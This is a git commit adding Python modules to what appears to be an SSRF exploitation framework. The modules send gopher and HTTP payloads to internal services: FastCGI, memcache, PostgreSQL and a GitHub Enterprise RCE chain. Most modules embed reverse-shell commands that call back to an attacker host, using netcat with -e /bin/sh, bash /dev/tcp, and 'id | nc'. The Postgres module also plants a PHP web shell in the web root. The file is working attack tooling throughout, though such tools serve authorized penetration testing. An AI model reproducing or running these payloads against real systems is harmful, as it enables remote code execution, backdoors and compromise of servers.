Add files via upload

Author: errorfiathck

modules/custom.py

@@ -0,0 +1,30 @@
+from utils.utils import *
+import urllib.parse
+import logging
+
+name          = "custom"
+description   = "Send custom data to a listening service, e.g: netcat"
+author        = "errorfiathck"
+documentation = []
+
+class exploit():
+    SERVICE_IP   = "127.0.0.1"
+    SERVICE_PORT = "8080"
+    SERVICE_DATA = "/bin/nc 127.0.0.1 4444 -e /bin/sh &"
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+        gen_hosts = gen_ip_list("127.0.0.1", args.level)
+        self.SERVICE_PORT = input("Service Port: ")
+        self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
+
+        for gen_host in gen_hosts:
+            payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
+            
+            if args.verbose == True:
+                logging.info(f"Generated payload : {payload}")
+
+            r = requester.do_request(args.param, payload)
+
+            if args.verbose == True:
+                logging.info(f"Module '{name}' ended !")

modules/fastcgi.py

@@ -0,0 +1,38 @@
+from utils.utils import *
+import logging
+
+name          = "fastcgi"
+description   = "FastCGI RCE"
+author        = "errorfiathck"
+documentation = []
+
+class exploit():
+    SERVER_HOST = "127.0.0.1"
+    SERVER_PORT = "4242"
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+
+        # Handle args for reverse shell
+        if args.lhost == None: self.SERVER_HOST = input("Server Host:")
+        else:                  self.SERVER_HOST = args.lhost
+
+        if args.lport == None: self.SERVER_PORT = input("Server Port:")
+        else:                  self.SERVER_PORT = args.lport
+
+        # Using a generator to create the host list
+        # Edit the following ip if you need to target something else
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        for ip in gen_host:
+
+            # Data and port for the service
+            port = "9000"
+            data = "%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/SERVER_HOST/SERVER_PORT%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00"
+            payload = wrapper_gopher(data, ip , port)
+
+            # Handle args for reverse shell
+            payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
+            payload = payload.replace("SERVER_PORT", self.SERVER_PORT)
+
+            # Send the payload
+            r = requester.do_request(args.param, payload)

modules/github.py

@@ -0,0 +1,46 @@
+from utils.utils import *
+import urllib.parse
+import logging
+
+name          = "github"
+description   = "Github Enterprise RCE < 2.8.7"
+author        = "Orange"
+documentation = [
+    "https://www.exploit-db.com/exploits/42392/",
+    "https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html"
+]
+
+class exploit():
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+
+        # Data for the service
+        ip   = "0"
+        port = "8000"
+        data = "composer/send_email?to=orange@chroot.org&url=http://127.0.0.1:11211/"
+    
+        cmd = "id | nc SERVER_HOST SERVER_PORT"
+        # cmd = "nc SERVER_HOST SERVER_PORT -e /bin/sh"
+        marshal_code = f'\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`{cmd}`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'
+        payload = [
+            '',
+            'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code),
+            marshal_code,
+            '',
+            ''
+        ]
+        payload = map(urllib.parse.quote, payload)
+        payload = wrapper_http(data+'%0D%0A'.join(payload), ip, port)
+
+        # Handle args for reverse shell
+        if args.lhost == None: payload = payload.replace("SERVER_HOST", input("Server Host:"))
+        else:                  payload = payload.replace("SERVER_HOST", args.lhost)
+
+        if args.lport == None: payload = payload.replace("SERVER_PORT", input("Server Port:"))
+        else:                  payload = payload.replace("SERVER_PORT", args.lport)
+
+
+        logging.info("You need to insert the WebHooks in 'https://ghe-server/:user/:repo/settings/hooks'")
+        logging.info("Then make a request to 'https://ghe-server/search?q=ggggg&type=Repositories'")
+        logging.info(f"Payload : {payload}")

modules/memcache.py

@@ -0,0 +1,34 @@
+from utils.utils import *
+import urllib.parse
+import logging
+
+name          = "memcache"
+description   = "Store data inside the memcache instance"
+author        = "errorfiathck"
+documentation = []
+
+class exploit():
+    SERVICE_IP   = "127.0.0.1"
+    SERVICE_PORT = "11211"
+    SERVICE_DATA = "\r\n"
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        payload = input("Data to store: ")
+
+        self.SERVICE_DATA += f'set payloadname 0 0 {len(payload)}\r\n'
+        self.SERVICE_DATA += f'{payload}\r\n'
+        self.SERVICE_DATA += 'quit\r\n'
+        self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA)
+
+        for SERVICE_IP in gen_host:
+            payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT)
+
+            if args.verbose == True:
+                logging.info(f"Generated payload : {payload}")
+
+            r = requester.do_request(args.param, payload)
+
+            if args.verbose == True:
+                logging.info("Module '{name}' ended !")

modules/postgres.py

@@ -0,0 +1,88 @@
+from utils.utils import *
+import logging
+import binascii
+
+# NOTE
+# This exploit is a Python 3 version of the Gopherus tool
+
+name        = "postgres"
+description = "Execute Postgres command"
+author      = "sengkyaut"
+documentation = [
+    "https://github.com/tarunkant/Gopherus"
+]
+
+class exploit():
+    user    = "postgres"
+    database = "postgres"
+    reverse = "COPY (SELECT '<?php system(\"bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1\");?>') TO '/var/www/html/shell.php';"
+    php_cmd_shell = "COPY (SELECT '<?php system($_GET[\"cmd\"]);?>') TO '/var/www/html/shell.php';"
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+
+        # Get the username, database, query
+        self.user = input("Give Postgres username (Default postgres): ") or self.user
+        self.database = input("Give Postgres Database name (Default postgres): ") or self.database
+        query = input("Give Postgres query to execute (reverse or phpshell or any Postgres statement): ")
+
+        # Reverse shell - writing system() in /var/www/html/shell.php
+        if query == "reverse":
+            self.query = self.reverse
+            if args.lhost == None: 
+                self.query = self.query.replace("SERVER_HOST", input("Server Host:"))
+            else:
+                self.query = self.query.replace("SERVER_HOST", args.lhost)
+
+            if args.lport == None: 
+                self.query = self.query.replace("SERVER_PORT", input("Server Port:"))
+            else:
+                self.query = self.query.replace("SERVER_PORT", args.lport)
+
+        elif query == "phpshell":
+            self.query = self.php_cmd_shell
+
+        else:
+            self.query  = query
+
+        # For every IP generated, send the payload
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        for ip in gen_host:
+            payload = self.get_payload(self.query, ip)
+            logging.info(f"Generated payload : {payload}")
+
+            r = requester.do_request(args.param, payload)
+
+            if query == "reverse" or query == "phpshell":
+                logging.info(f"Please check the shell.php on the web root for confirmation.")
+
+            logging.info(f"Module '{name}' ended !")
+
+    def encode(self, s, ip):
+        a = [s[i:i + 2] for i in range(0, len(s), 2)]
+        return wrapper_gopher("%"+"%".join(a), ip, "5432")
+
+    def encode_to_hex_str(self, data):
+        return binascii.hexlify(data.encode()).decode()
+
+    def get_payload(self, query, ip):
+        if(query.strip()!=''):
+            # Encode username, db and query
+            encode_user = self.encode_to_hex_str(self.user)
+            encode_db =  self.encode_to_hex_str(self.database)
+            encode_query = self.encode_to_hex_str(self.query)
+            len_query = len(query) + 5
+
+            # Construct the payload
+            start = "000000" + self.encode_to_hex_str(chr(4+len(self.user)+8+len(self.database)+13)) + "000300"
+            data = "00" + self.encode_to_hex_str("user") + "00" + encode_user + "00" + self.encode_to_hex_str("database") + "00" + encode_db
+            data += "0000510000" + str(hex(len_query)[2:]).zfill(4)
+            data += encode_query
+            end = "005800000004"
+
+            packet = start + data + end
+            final = self.encode(packet, ip)
+            return final
+        else:
+            logging.error(f"Query can't be empty")
+            raise Exception('Postgres query empty!')

modules/template.py

@@ -0,0 +1,37 @@
+from utils.utils import *
+import logging
+
+name          = "servicename in lowercase"
+description   = "ServiceName RCE - What does it do"
+author        = "Name or pseudo of the author"
+documentation = ["http://link_to_a_research", "http://another_link"]
+
+class exploit():
+    SERVER_HOST = "127.0.0.1"
+    SERVER_PORT = "4242"
+
+    def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
+
+        # Handle args for reverse shell
+        if args.lhost == None: self.SERVER_HOST = input("Server Host:")
+        else:                  self.SERVER_HOST = args.lhost
+
+        if args.lport == None: self.SERVER_PORT = input("Server Port:")
+        else:                  self.SERVER_PORT = args.lport
+
+        # Using a generator to create the host list
+        gen_host = gen_ip_list("127.0.0.1", args.level)
+        for ip in gen_host:
+
+            # Data and port for the service
+            port = "6379"
+            data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
+            payload = wrapper_gopher(data, ip , port)
+
+            # Handle args for reverse shell
+            payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
+            payload = payload.replace("SERVER_PORT", self.SERVER_PORT)
+
+            # Send the payload
+            r = requester.do_request(args.param, payload)